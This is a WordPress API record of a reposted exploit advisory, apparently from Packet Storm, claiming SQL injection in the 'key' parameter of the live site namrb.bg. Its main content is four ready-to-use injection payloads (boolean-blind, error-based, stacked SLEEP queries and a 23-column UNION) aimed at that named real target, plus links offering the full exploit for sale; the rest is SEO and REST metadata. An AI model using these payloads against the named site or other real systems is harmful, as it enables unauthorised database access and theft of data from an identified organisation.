{"id":17650,"date":"2025-09-16T13:14:55","date_gmt":"2025-09-16T13:14:55","guid":{"rendered":"http:\/\/localhost\/?p=17650"},"modified":"2025-09-16T13:14:55","modified_gmt":"2025-09-16T13:14:55","slug":"namrbbg-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=17650","title":{"rendered":"\ud83d\udcc4 namrb.bg SQL Injection_PACKETSTORM:209542"},"content":{"rendered":"

{“lastseen”:”2025-09-16T16:46:09″,”description”:”namrb.bg suffers from a remote SQL injection vulnerability. The owner of…”,”published”:”2025-09-15T00:00:00″,”modified”:”2025-09-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 namrb.bg SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:209542″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Titles: namrb.bg app-Multiple-SQLi\\n # Author: nu11secur1ty\\n # Date: 09\/15\/2025\\n # Vendor: https:\/\/www.namrb.bg\/\\n # Software: https:\/\/www.namrb.bg\/\\n # Reference: https:\/\/portswigger.net\/web-security\/sql-injection\\n \\n ## Description:\\n The `key` parameter appears to be vulnerable to SQL injection attacks. A\\n single quote was submitted in the cat parameter, and a database error\\n message was returned. Two single quotes were then submitted and the error\\n message disappeared. You should review the contents of the error message,\\n and the application’s handling of other input, to confirm whether a\\n vulnerability is present.\\n \\n STATUS: HIGH-CRITICAL Vulnerability\\n \\n \\n [+]Exploit:\\n – SQLi:\\n \\n “`SQLi\\n —\\n Parameter: key (GET)\\n Type: boolean-based blind\\n Title: OR boolean-based blind – WHERE or HAVING clause (NOT)\\n Payload: year=0\\u0026cat=0’\\u0026key=’)) OR NOT 2666=2666 AND\\n ((‘yXjW’=’yXjW\\u0026s_search=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5\\n \\n Type: error-based\\n Title: MySQL \\u003e= 5.0 OR error-based – WHERE, HAVING, ORDER BY or GROUP\\n BY clause (FLOOR)\\n Payload: year=0\\u0026cat=0’\\u0026key=’)) OR (SELECT 4704 FROM(SELECT\\n COUNT(*),CONCAT(0x71707a7171,(SELECT\\n (ELT(4704=4704,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM\\n INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND\\n ((‘nghM’=’nghM\\u0026s_search=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5\\n \\n Type: stacked queries\\n Title: MySQL \\u003e= 5.0.12 stacked queries (comment)\\n Payload: year=0\\u0026cat=0’\\u0026key=’));SELECT\\n SLEEP(11)#\\u0026s_search=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5\\n \\n Type: UNION query\\n Title: MySQL UNION query (UCHAR) – 23 columns\\n Payload: year=0\\u0026cat=0’\\u0026key=’)) UNION ALL SELECT\\n ‘UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,CONCAT(0x71707a7171,0x786a4a644251656873507a717a76504c50617258467463526e61716e766d7342414d41636e544153,0x7171766b71),’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’#\\u0026s_search=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5\\n —\\n “`\\n ##WARNING:\\n This has ALREADY been reported to the OWNER of this web application! If you\\n BUY THIS POST, YOU WILL BE AUTOMATICALLY RESPONSIBLE IN FRONT OF THE LAW!\\n THIS IS ONLY FOR THE OWNERS OF THIS WEB APPLICATION! THANK YOU!\\n \\n # Reproduce:\\n [href](https:\/\/www.patreon.com\/posts\/namrb-org-sqli-138413412)\\n \\n # Buy an exploit only:\\n [href](https:\/\/www.patreon.com\/posts\/namrb-org-sqli-138413412)\\n \\n # Time spent:\\n 00:15:00\\n \\n \\n — \\n System Administrator – Infrastructure Engineer\\n Penetration Testing Engineer\\n Exploit developer at https:\/\/packetstormsecurity.com\/\\n https:\/\/cve.mitre.org\/index.html\\n https:\/\/cxsecurity.com\/ and https:\/\/www.exploit-db.com\/\\n home page: https:\/\/www.nu11secur1ty.com\/\\n hiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=\\n nu11secur1ty \\u003chttp:\/\/nu11secur1ty.com\/\\u003e”,”sourceHref”:”https:\/\/packetstorm.news\/download\/209542″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/209542\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-09-16T16:46:09″,”description”:”namrb.bg suffers from a remote SQL injection vulnerability. The owner of…”,”published”:”2025-09-15T00:00:00″,”modified”:”2025-09-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 namrb.bg SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:209542″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Titles: namrb.bg app-Multiple-SQLi\\n # Author: nu11secur1ty\\n # Date: 09\/15\/2025\\n # Vendor:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-17650","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 namrb.bg SQL Injection_PACKETSTORM:209542 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=17650\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 namrb.bg SQL Injection_PACKETSTORM:209542 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-09-16T16:46:09″,”description”:”namrb.bg suffers from a remote SQL injection vulnerability. The owner of…”,”published”:”2025-09-15T00:00:00″,”modified”:”2025-09-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 namrb.bg SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:209542″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Titles: namrb.bg app-Multiple-SQLin # Author: nu11secur1tyn # Date: 09\/15\/2025n # Vendor:...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=17650\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-09-16T13:14:55+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=17650#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=17650\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 namrb.bg SQL Injection_PACKETSTORM:209542\",\"datePublished\":\"2025-09-16T13:14:55+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=17650\"},\"wordCount\":610,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=17650#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=17650\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=17650\",\"name\":\"\ud83d\udcc4 namrb.bg SQL Injection_PACKETSTORM:209542 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-09-16T13:14:55+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=17650#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=17650\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=17650#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 namrb.bg SQL Injection_PACKETSTORM:209542\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 namrb.bg SQL Injection_PACKETSTORM:209542 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=17650","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 namrb.bg SQL Injection_PACKETSTORM:209542 - zero redgem","og_description":"{“lastseen”:”2025-09-16T16:46:09″,”description”:”namrb.bg suffers from a remote SQL injection vulnerability. The owner of…”,”published”:”2025-09-15T00:00:00″,”modified”:”2025-09-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 namrb.bg SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:209542″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Titles: namrb.bg app-Multiple-SQLin # Author: nu11secur1tyn # Date: 09\/15\/2025n # Vendor:...","og_url":"https:\/\/zero.redgem.net\/?p=17650","og_site_name":"zero redgem","article_published_time":"2025-09-16T13:14:55+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=17650#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=17650"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 namrb.bg SQL Injection_PACKETSTORM:209542","datePublished":"2025-09-16T13:14:55+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=17650"},"wordCount":610,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=17650#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=17650","url":"https:\/\/zero.redgem.net\/?p=17650","name":"\ud83d\udcc4 namrb.bg SQL Injection_PACKETSTORM:209542 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-09-16T13:14:55+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=17650#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=17650"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=17650#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 namrb.bg SQL Injection_PACKETSTORM:209542"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/17650","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17650"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/17650\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17650"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17650"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17650"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}